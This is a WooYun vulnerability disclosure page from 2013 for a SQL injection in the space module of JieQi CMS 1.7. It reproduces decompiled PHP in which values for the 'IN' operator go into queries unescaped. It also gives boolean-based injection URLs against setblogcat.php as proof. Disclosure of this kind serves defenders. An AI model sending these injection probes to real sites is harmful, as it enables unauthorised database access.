当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2013-43908

漏洞标题: 杰奇CMS 1.7商业版注入漏洞

相关厂商: jieqi.com

漏洞作者: Phale

提交时间: 2013-11-25 17:20

公开时间: 2014-02-23 17:20

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 5

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 杰奇CMS 1.7商业漏洞

1人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-25: 细节已通知厂商并且等待厂商处理中
2013-11-25: 厂商已经确认,细节仅向厂商公开
2013-11-28: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-01-19: 细节向核心白帽子及相关领域专家公开
2014-01-29: 细节向普通白帽子公开
2014-02-08: 细节向实习白帽子公开
2014-02-23: 细节向公众公开

简要描述:

杰奇CMS 1.7商业版用了Zend加密,批量解密后,发现程序员用了几个函数,使得这套系统基本没了注入漏洞。在判断ip时,程序员将.过滤再判断是否是为数字,值得借鉴。

详细说明:

code 区域
class criteria extends criteriaelement


{


    var $column;  //字段


    var $operator;  //分隔符


    var $value; //值


    function criteria( $_obfuscate_eZJe9OBy, $_obfuscate_VgKtFeg = "", $_obfuscate_JChWBNMCFOA = "=" )


    {


        $this->column = $_obfuscate_eZJe9OBy;


        $this->value = $_obfuscate_VgKtFeg;


        $this->operator = $_obfuscate_JChWBNMCFOA;


    }


    function render( )


    {


        if ( !empty( $this->column ) )


        {


            $_obfuscate_yHkENun4 = $this->column." ".$this->operator;


..................................


        if ( isset( $this->value ) )


..................................


 //当分隔符为in时没有对值有任何处理。EditPlus搜索含有"IN"的语句发现了注入。


            if ( strtoupper( $this->operator ) == "IN" )  


            {


                $_obfuscate_yHkENun4 .= " ".$this->value;


                return $_obfuscate_yHkENun4;


            }


//引入单引号


            $_obfuscate_yHkENun4 .= " '".jieqi_dbslashes( trim( $this->value ) )."'";


        }


        return $_obfuscate_yHkENun4;


------------------------------------------------------------------------------------------


switch ( $_REQUEST[action] )


{


case "do_edit" :


    include_once( $jieqiModules['space']['path']."/class/blogcat.php" );


    $blog_cat_handler = jieqispaceblogcathandler::getinstance( "JieqiSpaceBlogCatHandler" );


    if ( $_REQUEST['delete_checkbox'] )


    {


        $tmpstr = "(".implode( ",", $_REQUEST['delete_checkbox'] ).")"; 


        $criteria = new criteriacompo( new criteria( "`id`", $tmpstr, "in" ) );  //id in ()


        $criteria->add( new criteria( "`uid`", $uid ) );


        $criteria->add( new criteria( "`type`", $_REQUEST['type'], "=" ) );


        $criteria->add( new criteria( "`default_cat`", 1, "!=" ) );


        $blog_cat_handler->queryobjects( $criteria );


        $v = $blog_cat_handler->getobject( );


        if ( !empty( $v ) )


        {


            $num = $v->getvar( "num" );


            $blog_cat_handler->delete( $criteria );


            unset( $criteria );


        }

漏洞证明:

code 区域
http://localhost/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=1%23







code 区域
http://localhost/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=2%23

修复方案:

版权声明:转载请注明来源 Phale@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-11-25 18:29

厂商回复:

由于对用户提交变量过滤不严产生的漏洞。
本漏洞来自JIEQI CMS 1.6版本。
1.7及以上版本默认无space模块,如果有,则是个人私自整合行为。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录